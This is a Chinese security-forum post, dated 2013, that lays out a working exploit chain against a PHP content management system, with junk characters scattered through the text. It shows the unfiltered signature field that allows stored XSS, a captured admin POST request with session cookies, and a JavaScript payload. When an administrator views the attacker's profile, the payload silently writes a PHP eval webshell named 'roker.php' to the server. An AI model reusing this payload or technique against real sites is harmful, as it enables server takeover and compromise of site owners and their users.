|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题3 {/ ^; r! Z# a8 C6 e- A
官网已经修补了,所以重新下了源码
$ @3 @1 g* U5 P4 H/ r Z因为 后台登入 还需要认证码 所以 注入就没看了。, `9 [ c2 M4 h
存在 xss
$ C/ \9 O! R- d0 M% H2 c+ W漏洞文件 user/member/skin_edit.php; a4 x$ d+ {1 Y& I6 H* _( I
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
# z* {, D7 G' j& B& [
* w6 M/ O$ y! t' r" V+ p) A" ~' Y0 S# l</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?># Z# N0 l" n2 X' v3 w/ Z
) s8 s: G" K4 v! a# n9 P
</textarea></td></tr>2 _5 Z- Y- A$ T- P; }. g+ t3 \& p% v
2 C. t+ M0 s/ Z3 O3 X, B- S7 E user/do.php ) }8 V- u1 _5 L. q
2 X) g. F0 @# Q9 D
7 ]$ `/ T0 R7 S& K+ nif($op=='zl'){ //资料
& P' e) t( X8 q: i & D3 E. T& w, Q! W
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
) Z' @( [/ W' Q u7 c+ @ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));. \$ c- i" L9 X
/ l. p: a3 H* }* H1 G3 l
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
- A5 I: K: y s- E, C ' s* U `3 }& s0 b& a! S2 n
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'* e' v0 S4 Z) [' W; D9 O
where CS_Name='".$cscms_name."'";8 [( G3 h2 w J }) l6 z% E9 }
9 a$ x8 c/ y9 D( J7 D: F7 ^/ g if($db->query($sql)){5 N2 i p6 N# ^7 ^) X. }0 v
" F* Y: N% {# w, N; L9 h, P exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
* W! e. Q0 q% q g x0 K - L9 K t8 J. K$ G; J$ m0 A: y
}else{6 z2 U& s0 `/ H
! ]3 k0 E9 w( E
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));' l/ i. W& E* j9 _, x R
, [2 r# \( D ]: s& V
}/ C; O4 v' O) Y0 q7 M: D) V
8 O0 p: u4 L* ^5 ?1 g+ S: E3 b
9 E$ K2 W* b7 q8 R- H) p# u9 G
没有 过滤导致xss产生。
! a' C2 f( c' Q. f1 T后台 看了下 很奇葩的是可以写任意格式文件。。
- r, u: V" `9 c ?抓包。。& |" a% ]( E8 j( |1 L! U& |
& N3 N4 V/ D1 C/ c" I2 i
# p1 f5 j; X6 G2 r T
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
H& v4 t6 s! j) _1 w$ x+ F7 U
# Q9 v8 O' J G' RAccept: text/html, application/xhtml+xml, */*
/ r! W( Z. s" Q7 z5 l d 7 E1 J1 f6 x# D3 L$ M' J1 X" N( a+ p
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
6 j, S) t0 A$ o2 c4 ~/ _9 C: z. l
! c$ f# N$ h& L! |/ o; dAccept-Language: zh-CN
5 {0 i7 j }, b. e8 u; V . t' V9 A' |2 M* A- T( B
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 F2 B5 @) A' Q5 D* h: Y' n7 G% ? h% K; J, N# t* k2 j
Content-Type: application/x-www-form-urlencoded
* e- ~0 \& A7 O* C ! B2 n3 M% v& w+ V
Accept-Encoding: gzip, deflate, d$ H7 I; u8 W; W+ I, l
& n4 @9 E' }6 e9 Q
Host: 127.0.0.1
/ X! V8 k# z3 G. y5 n5 n! p( i( w 0 @+ k `, l0 F4 }' [. A
Content-Length: 38; D1 z g( f2 l- t/ X) L
0 Y8 ~9 N6 ^* S) |DNT: 1
W/ r. d6 x: \) J7 x
, G) Z4 Y0 |& T" L& ZConnection: Keep-Alive% O0 ?# h1 ]5 Q T2 _- [$ }
: i T* E# f. h9 @, ECache-Control: no-cache
% ~" M8 K4 O; P2 p. W
) U% e! ]2 @( G" _5 |% xCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594$ N* x8 `& q, z5 P" n& D+ q
" g% P3 S8 W! I: D8 ~6 n }- i+ ]$ Z/ F) p0 l/ A* G+ v
name=aaa.php&content=%3Cs%3E%3Ca%25%3E. Z* u: N" ~# q4 P
5 q/ h& e t: y+ F; j
, B1 p s' n6 @ H6 v4 Y- F y0 o \: T) h8 @* d
于是 构造js如下。, B- m% Q% ^/ \
# [1 @) h1 B/ t9 P2 U
本帖隐藏的内容<script> 2 z/ x" r9 f2 t3 f
thisTHost = top.location.hostname;0 t. Y0 [: @' e4 |
% N9 W& l: R2 K/ W
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
" C4 n+ Z* x/ a. {$ L+ r% P& V* a0 F$ G
# ` [' d, Y, I l) A6 Z! Tfunction PostSubmit(url, data, msg) { : G/ L' _2 |7 |) o \& Z7 M+ F5 U
var postUrl = url;
) A# q$ V; Z0 X1 Y" O) @9 ] 3 Z- r8 z" t* k2 V. C) R1 g
var postData = data;
/ B: {! \6 B& x( [6 p. t1 l var msgData = msg; : P; Z; [7 e# Q' G6 y/ w2 h
var ExportForm = document.createElement("FORM");
. A( x2 R4 z4 O' u0 M document.body.appendChild(ExportForm); # ?: ^& s) w7 }* N; T; c
ExportForm.method = "POST"; ( E$ r* W# e& c9 x' s( V
var newElement = document.createElement("input"); : V4 q' {& u. f X' f/ |! \; y5 a4 b
newElement.setAttribute("name", "name");
* p, R. C b5 N8 ?" t% a" g& @ newElement.setAttribute("type", "hidden"); ! H% C* g; k4 U2 a# [, i1 w
var newElement2 = document.createElement("input");
9 M* V1 D( D }3 g( ~8 i newElement2.setAttribute("name", "content"); ! [( a' G M% Z% \; v9 z2 M
newElement2.setAttribute("type", "hidden");
9 O3 A" n1 B9 r1 X. J0 Q ExportForm.appendChild(newElement); ( G% _" n6 p! b; M
ExportForm.appendChild(newElement2);
/ D& G$ m. h; N7 a9 X& e6 T$ s newElement.value = postData; $ Z8 q1 Q! e2 e
newElement2.value = msgData;
' n h3 Q% i* r, O! I8 p ExportForm.action = postUrl;
3 a. Y- Q6 _* M6 ]! ]2 E ExportForm.submit();
6 s. E4 Z; n6 }5 ]};, T4 l) G1 B/ I- ~7 b
+ |# r5 }. ^( N) P. v# ?. J) @9 v
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
4 b% T0 E- w' _7 u . c7 T1 ~. u6 I* M( ^& B/ {
</script>
( e+ z3 C* d# B& i. y5 n# X6 j0 |- } [ f) ^) Z/ n
6 z. P1 m) L7 E& [ X' }) _6 w6 [/ m7 l! R$ |7 f% \" ?9 W
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
3 }: N5 }* c0 m& Q8 l. R8 k用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)6 s; { R, {6 a! m) h8 s2 _2 n
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
( B* p+ Q2 ?2 U1 Z
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对